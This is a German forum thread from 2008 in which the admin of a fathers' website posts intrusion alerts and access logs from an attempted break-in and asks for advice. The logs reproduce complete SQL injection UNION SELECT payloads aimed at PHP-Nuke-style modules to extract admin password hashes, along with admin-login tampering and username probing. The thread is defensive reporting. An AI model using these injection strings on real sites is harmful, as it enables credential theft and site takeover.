[Union] Hack detected (0), on Vater sein

Begonnen von DeepThought, 20 April 2008, 18:47:00

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

Drucken
Nach unten Seiten1
Benutzer-Aktionen

DeepThought

20 April 2008, 18:47:00
Hallo,

via E-Mail am 20.04.2008, 18:30 Uhr, reingekommen:

Code Auswählen


--------------------------------------------------
20-04-2008 18:29:44 [Union] Hack detected (0)
user: Anonym
admin: Anonym
request:
_GET[name] = News 
_GET[file] = article 
_GET[sid] = 99999999' UNION SELECT null as catid,pwd as aid,null as time,pwd as title,null as hometext,aid as bodytext,null as topic,null as informant,null as notes,null as acomm, null as haspoll,null as pollID,null as score,null as ratings FROM `nuke_authors` WHERE `radminsuper` ='1
Serverinfo:
REMOTE_ADDR:          89.244.225.98
QUERY_STRING:         name=News&file=article&sid=99999999'+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60nuke_authors%60%20WHERE%20%60radminsuper%60%20='1
REQUEST_URI:          /modules.php?name=News&file=article&sid=99999999'+UNION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20as%20time,pwd%20as%20title,null%20as%20hometext,aid%20as%20bodytext,null%20as%20topic,null%20as%20informant,null%20as%20notes,null%20as%20acomm,%20null%20as%20haspoll,null%20as%20pollID,null%20as%20score,null%20as%20ratings%20FROM%20%60nuke_authors%60%20WHERE%20%60radminsuper%60%20='1
REMOTE_PORT:          61226
REMOTE_HOST:          89.244.225.98
HTTP_REFERER:         
HTTP_USER_AGENT:     
HTTP_X_FORWARDED_FOR:


siteadress: http://vatersein.de

Ich denke, das System hat den Angriff abgeweht, denn die Site läuft problemlos. Mich wundert die IP, von der aus der Hack gestartet wurde (vodafone).

An das Log vom Server komme ich erst morgen ran.

Gruß

DeepThought



Nachtrag: Unregistrierte können keine Artikel oder Kommentare schreiben. Das Tracking liest sich wie folgt:

Code Auswählen
20.04.08  18:29:45  89.244.225.98  080420182945   /modules.php?name=News
20.04.08  18:29:44  89.244.225.98  080420182944   /modules.php?name=News&file=article&sid=99999999'+U NION+SELECT+null%20as%20catid,pwd%20as%20aid,null%2 0as%20time,pwd%20as%20title,null%20as%20hometext,ai d%20as%20bodytext,null%20as%20topic,null%20as%20inf ormant,null%20as%20notes,null%20as%20acomm,%20null%
20.04.08  18:29:13  89.244.225.98  080420182911   /index.php
20.04.08  18:29:11  89.244.225.98  080420182911   /modules.php?name=News


Der referer im ersten Trackingdatensatz lautet:
Code Auswählen
http://www.google.de/search?q=%22modules.php%3Fname%3Dnews%22&hl=de&client=firefox-a&rls=org.mozilla:en-US:official&start=50&sa=N

DeepThought

#1
21 April 2008, 08:40:02
Hallo,

so langsam wird's mir schwummerig. Der Typ hat sich sogar registriert.

Tracking als unreg. User:
Code Auswählen
21.04.08 08:19:47 89.244.207.163 080421081007   /modules.php?name=lid&&value=-1%20UNION%20ALL%20SEL ECT%20UNHEX(HEX(pwd)),2,3%20FROM%20nuke_authors
21.04.08 08:16:54 89.244.207.163 080421081007   /admin.php
21.04.08 08:10:07 89.244.207.163 080421081007   /modules.php?name=Downloads
21.04.08 07:57:38 89.244.207.163 080421075738   /modules.php?name=News
21.04.08 07:56:07 89.244.207.163 080421075607   /modules.php?name=News
21.04.08 07:56:06 89.244.207.163 080421075606   /modules.php?name=News&file=article&sid=99999999+UN ION+SELECT+null%20as%20catid,pwd%20as%20aid,null%20 as%20time,pwd%20as%20title,null%20as%20hometext,aid %20as%20bodytext,null%20as%20topic,null%20as%20info rmant,null%20as%20notes,null%20as%20acomm,%20null%2
21.04.08 07:55:44 89.244.207.163 080421075544   /modules.php?name=News
21.04.08 07:54:49 89.244.207.163 080421075449   /modules.php?name=News
21.04.08 07:54:48 89.244.207.163 080421075448   /modules.php?name=News&file=article&sid=99999999'+U NION+SELECT+null%20as%20catid,pwd%20as%20aid,null%2 0as%20time,pwd%20as%20title,null%20as%20hometext,ai d%20as%20bodytext,null%20as%20topic,null%20as%20inf ormant,null%20as%20notes,null%20as%20acomm,%20null%
21.04.08 07:45:58 89.244.207.163 080421074558   /modules.php?name=News
21.04.08 07:43:05 89.244.207.163 080421073606   /modules.php?name=News
21.04.08 07:39:07 89.244.207.163 080421073606   /admin.php?$result=sql_query(%22select%20pwd,%20adm language%20from%20%22$prefix.%22_authors%20%20where %20aid='$aid'%22,%20$dbi);
21.04.08 07:36:06 89.244.207.163 080421073606   /admin.php?$aid=radminsuper&&pwd=97cb0cf32c437d73cb 8ce2e3665ec275&&($$op%20==login)
21.04.08 06:33:36 89.244.207.163 080421062741   /admin.php?$admin&&check.cookie
21.04.08 06:28:28 89.244.207.163 080421062741   /admin.php?op=nextlogin_1
21.04.08 06:28:07 89.244.207.163 080421062741   /admin.php?op=nextlogin_0
21.04.08 06:27:41 89.244.207.163 080421062741   /admin.php
21.04.08 06:27:07 89.244.207.163 080421062707   /admin.php
21.04.08 06:26:55 89.244.207.163 080421062655   /admin.php?echo$admin
21.04.08 06:25:48 89.244.207.163 080421062548   /admin.php
21.04.08 06:25:11 89.244.207.163 080421062511   /admin.php?echo$admin
21.04.08 06:24:51 89.244.207.163 080421062451   /index.php
21.04.08 06:23:20 89.244.207.163 080421062320   /Forum.html
21.04.08 06:23:15 89.244.207.163 080421062315   /Topics.html
21.04.08 06:23:11 89.244.207.163 080421062311   /index.php
21.04.08 06:23:04 89.244.207.163 080421062304   /admin.php
21.04.08 06:20:14 89.244.207.163 080421062014   /admin.php
21.04.08 06:20:11 89.244.207.163 080421062011   /admin.php?$admin&&check.cookie
21.04.08 06:19:51 89.244.207.163 080421061951   /admin.php?$admin
21.04.08 06:18:28 89.244.207.163 080421061818   /Forum.html
21.04.08 06:18:18 89.244.207.163 080421061818   /index.php
21.04.08 06:02:14 89.244.207.163 080421052115   /index.php
21.04.08 05:59:31 89.244.207.163 080421052115   /admin.php?echo$admin
21.04.08 05:59:12 89.244.207.163 080421052115   /admin.php?$admin
21.04.08 05:59:11 89.244.207.163 080421052115   /admin.php?op=nextlogin_0
21.04.08 05:59:01 89.244.207.163 080421052115   /admin.php?op=nextlogin_1
21.04.08 05:58:35 89.244.207.163 080421052115   /admin.php?op=nextlogin_0
21.04.08 05:57:40 89.244.207.163 080421052115   /admin.php?$admin
21.04.08 05:55:25 89.244.207.163 080421052115   /Forum.html
21.04.08 05:55:20 89.244.207.163 080421052115   /index.php
21.04.08 05:54:13 89.244.207.163 080421052115   /admin.php?op=nextlogin_0
21.04.08 05:48:35 89.244.207.163 080421052115   /admin.php
21.04.08 05:48:02 89.244.207.163 080421052115   /modules.php?name=Userinfo&uname=admin&check_cookie =admin
21.04.08 05:25:55 89.244.207.163 080421052115   /modules.php?name=Userinfo&uname=admin&check_cookie =
21.04.08 05:25:50 89.244.207.163 080421052115   /modules.php?name=Userinfo&uname=admin&check_cookie
21.04.08 05:25:40 89.244.207.163 080421052115   /modules.php?name=Userinfo&uname=admin&check_cookie =97cb0cf32c437d73cb8ce2e3665ec275
21.04.08 05:25:25 89.244.207.163 080421052115   /modules.php?name=Userinfo&uname=DeepThought&check_ cookie=97cb0cf32c437d73cb8ce2e3665ec275
21.04.08 05:24:57 89.244.207.163 080421052115   /modules.php?name=Userinfo&uname=DeepThought&check_ cookie=admin
21.04.08 05:24:50 89.244.207.163 080421052115   /modules.php?name=Userinfo&uname=DeepThought&&check _cookie=admin
21.04.08 05:24:43 89.244.207.163 080421052115   /modules.php?name=Userinfo&uname=DeepThought&&check _cookie=admin
21.04.08 05:22:21 89.244.207.163 080421052115   /modules.php?name=Userinfo&uname=DeepThought
21.04.08 05:22:03 89.244.207.163 080421052115   /Forum.html
21.04.08 05:21:24 89.244.207.163 080421052115   /Forum.html
21.04.08 05:21:15 89.244.207.163 080421052115   /index.php
21.04.08 03:48:46 89.244.207.163 080421034837   /Forum.html
21.04.08 03:48:37 89.244.207.163 080421034837   /index.php
21.04.08 03:42:35 89.244.207.163 080421034225   /Forum.html
21.04.08 03:42:31 89.244.207.163 080421034225   /index.php
21.04.08 03:42:25 89.244.207.163 080421034225   /modules.php?name=Userinfo
21.04.08 03:27:54 89.244.207.163 080421032751   /index.php
21.04.08 03:27:51 89.244.207.163 080421032751   /modules.php?name=Your_Account&op=logoutfin
21.04.08 03:16:11 89.244.207.163 080421031356   /modules.php?name=User_Registration&op=activate_acc ount&new_check=11681&new_time=1208740516
21.04.08 03:15:16 89.244.207.163 080421031356   /modules.php?name=User_Registration
21.04.08 03:15:11 89.244.207.163 080421031356   /modules.php?name=User_Registration
21.04.08 03:14:55 89.244.207.163 080421031356   /register-me.html
21.04.08 03:14:43 89.244.207.163 080421031356   /modules.php?name=User_Registration
21.04.08 03:14:27 89.244.207.163 080421031356   /modules.php?name=User_Registration
21.04.08 03:13:56 89.244.207.163 080421031356   /register-me.html
21.04.08 03:11:49 89.244.207.163 080421031015   /modules.php?name=User_Registration
21.04.08 03:11:36 89.244.207.163 080421031015   /modules.php?name=User_Registration
21.04.08 03:11:02 89.244.207.163 080421031015   /modules.php?name=User_Registration
21.04.08 03:10:15 89.244.207.163 080421031015   /register-me.html
21.04.08 03:09:05 89.244.207.163 080421021259   /modules.php?name=News
21.04.08 03:04:51 89.244.207.163 080421021259   /index.php
21.04.08 02:09:40 89.244.207.163 080421020940   http://www.vatersein.de/modules.php
21.04.08 02:08:18 89.244.207.163 080421020818   http://www.vatersein.de/modules.php
21.04.08 02:08:03 89.244.207.163 080421020803   http://www.vatersein.de/modules.php
21.04.08 02:01:50 89.244.207.163 080421020150   http://www.vatersein.de/modules.php?uname=Admin
21.04.08 02:00:11 89.244.207.163 080421020011   http://www.vatersein.de/modules.php?


Tracking als reg. User:
Code Auswählen
21.04.08 05:12:17 89.244.207.163 080421034950 carlo_ /modules.php?name=Userinfo&uname=administrator
21.04.08 05:12:10 89.244.207.163 080421034950 carlo_ /modules.php?name=Userinfo&uname=admin
21.04.08 05:12:01 89.244.207.163 080421034950 carlo_ /modules.php?name=Userinfo&uname=radminsuper
21.04.08 05:11:44 89.244.207.163 080421034950 carlo_ /modules.php?name=Userinfo&uname=radminSuper
21.04.08 05:11:09 89.244.207.163 080421034950 carlo_ /modules.php?name=Userinfo&uname=rSuperadmin
21.04.08 05:10:17 89.244.207.163 080421034950 carlo_ /modules.php?name=Userinfo&uname=DeepThought
21.04.08 05:10:10 89.244.207.163 080421034950 carlo_ /modules.php?name=Userinfo&uname=Deep%20Thought
21.04.08 05:10:02 89.244.207.163 080421034950 carlo_ /modules.php?name=Userinfo&uname=Administrator
21.04.08 05:08:59 89.244.207.163 080421034950 carlo_ /Forum-board-36.html
21.04.08 05:08:43 89.244.207.163 080421034950 carlo_ /modules.php?name=Forum&action=search2
21.04.08 05:08:06 89.244.207.163 080421034950 carlo_ /Forum.html
21.04.08 05:07:43 89.244.207.163 080421034950 carlo_ /Members_List-letter-D-sortby-uname-page-7.html
21.04.08 05:07:40 89.244.207.163 080421034950 carlo_ /Members_List-letter-D-sortby-uname-page-6.html
21.04.08 05:07:37 89.244.207.163 080421034950 carlo_ /Members_List-letter-D-sortby-uname-page-5.html
21.04.08 05:07:31 89.244.207.163 080421034950 carlo_ /Members_List-letter-D-sortby-uname-page-4.html
21.04.08 05:07:22 89.244.207.163 080421034950 carlo_ /Members_List-letter-D-sortby-uname-page-3.html
21.04.08 05:07:14 89.244.207.163 080421034950 carlo_ /Members_List-letter-D-sortby-uname-page-2.html
21.04.08 05:07:07 89.244.207.163 080421034950 carlo_ /Members_List-letter-D-sortby-uname.html
21.04.08 05:07:00 89.244.207.163 080421034950 carlo_ /Members_List-letter-A-sortby-uname-page-15.html
21.04.08 05:06:58 89.244.207.163 080421034950 carlo_ /Members_List-letter-A-sortby-uname-page-14.html
21.04.08 05:06:55 89.244.207.163 080421034950 carlo_ /Members_List-letter-A-sortby-uname-page-13.html
21.04.08 05:06:52 89.244.207.163 080421034950 carlo_ /Members_List-letter-A-sortby-uname-page-12.html
21.04.08 05:06:46 89.244.207.163 080421034950 carlo_ /Members_List-letter-A-sortby-uname-page-11.html
21.04.08 05:06:42 89.244.207.163 080421034950 carlo_ /Members_List-letter-A-sortby-uname-page-10.html
21.04.08 05:06:09 89.244.207.163 080421034950 carlo_ /modules.php?name=Members_List
21.04.08 05:05:26 89.244.207.163 080421034950 carlo_ /modules.php?name=Search
21.04.08 05:04:52 89.244.207.163 080421034950 carlo_ /Forum.html
21.04.08 05:03:15 89.244.207.163 080421034950 carlo_ /modules.php?name=Userinfo
21.04.08 05:03:02 89.244.207.163 080421034950 carlo_ /modules.php?name=Userinfo&uname=Deep%20Thought
21.04.08 05:02:48 89.244.207.163 080421034950 carlo_ /modules.php?name=Userinfo&uname=Administrator
21.04.08 05:02:32 89.244.207.163 080421034950 carlo_ /modules.php?name=Userinfo&uname=Admin
21.04.08 04:58:58 89.244.207.163 080421034950 carlo_ /VS_Impressum.html
21.04.08 04:58:52 89.244.207.163 080421034950 carlo_ /VS_Impressum.html
21.04.08 04:57:46 89.244.207.163 080421034950 carlo_ /Forum-action-profile-u-2.html
21.04.08 04:52:22 89.244.207.163 080421034950 carlo_ /Forum.html
21.04.08 04:52:20 89.244.207.163 080421034950 carlo_ /Topics.html
21.04.08 04:52:16 89.244.207.163 080421034950 carlo_ /index.php
21.04.08 04:52:06 89.244.207.163 080421034950 carlo_ /modules.php?name=Userinfo
21.04.08 03:58:35 89.244.207.163 080421034950 carlo_ /Forum-action-unread.html
21.04.08 03:49:50 89.244.207.163 080421034837 carlo_ /modules.php?name=Forum
21.04.08 03:43:24 89.244.207.163 080421034225 carlo_ /modules.php?name=Forum
21.04.08 03:28:13 89.244.207.163 080421032751 carlo_ /modules.php?name=Your_Account
21.04.08 03:27:50 89.244.207.163 080421031616 carlo_ /log-me-out.html
21.04.08 03:27:39 89.244.207.163 080421031616 carlo_ /modules.php?name=Userinfo
21.04.08 03:27:08 89.244.207.163 080421031616 carlo_ /Forum-action-help.html
21.04.08 03:26:11 89.244.207.163 080421031616 carlo_ /Forum-action-profile-u-7389.html
21.04.08 03:25:33 89.244.207.163 080421031616 carlo_ /Forum.html
21.04.08 03:24:41 89.244.207.163 080421031616 carlo_ /home.html
21.04.08 03:24:33 89.244.207.163 080421031616 carlo_ /home.html
21.04.08 03:24:03 89.244.207.163 080421031616 carlo_ /Forum.html
21.04.08 03:23:38 89.244.207.163 080421031616 carlo_ /index.php
21.04.08 03:23:26 89.244.207.163 080421031616 carlo_ /Forum.html
21.04.08 03:16:29 89.244.207.163 080421031616 carlo_ /Forum.html
21.04.08 03:16:15 89.244.207.163 080421031356 carlo_ /modules.php?name=Userinfo


Irgendeine Anmerkung, Idee, Anregung? Ermittlungsbehörden einschalten?

Gruß

DeepThought

bajazzo

#2
21 April 2008, 08:45:56
cool bleiben und DokuWiki lesen.  ;)
Genie ist die grenzenlose Bereitschaft, sich Mühe zu geben.

DeepThought

#3
21 April 2008, 09:26:07
Hehe, ich bin so cool, du könntest 'n Becher Eis in mir drei Monate lagern  :BD:  ...und natürlich ist die Sicherheit vom pragmaMx ein wesentlicher Grund für meine coolness.

Mich erstaunt die Dreistigkeit und, natürlich, die Dummheit. Ich meine, der Typ hat sich registriert um sein Spiel weitermachen zu können. Damit verfüge ich über eine valide E-Mail-Adresse, so nicht Captcha und Registrierungsbestätigungs-E-Mail ausgehebelt wurden.

Naja, meine Freunde vom Kriminaldauerdienst haben dann halt was zu tun...

Gruß

DeepThought
Drucken
Nach oben Seiten1
Benutzer-Aktionen